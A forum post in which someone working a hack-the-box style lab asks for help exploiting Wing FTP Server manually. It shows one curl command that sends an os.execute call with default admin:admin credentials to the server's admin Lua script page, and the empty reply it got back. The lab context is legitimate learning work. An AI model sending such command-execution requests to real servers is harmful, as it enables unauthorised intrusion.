I'm going through a hack-the-box type provider and they have a box that has a vulnerable copy of Wing FTP Server. It's easily exploitable using Metasploit: https://www.exploit-db.com/exploits/34517" rel="nofollow
However I would like to complete their 'extra mile' challenge by exploiting the service manually. I figured this could be done using curl. This is my attempt:
Code: Select all
curl -i -s -k -u admin:admin -b 'UIDADMIN=adsfasdfasdfasdfasdfasdf' -X POST --data-binary $'command=os.execute(\'cmd.exe /c pwd\')' "http://10.1.1.1:5466/admin_lua_script.html"
Edit: All I ever get back is
Code: Select all
HTTP/1.0 200 HTTP OK
Server: Wing FTP Server(Ferdi Bak)
Cache-Control: private
Content-Type: text/html
Content-Length: 0
Connection: close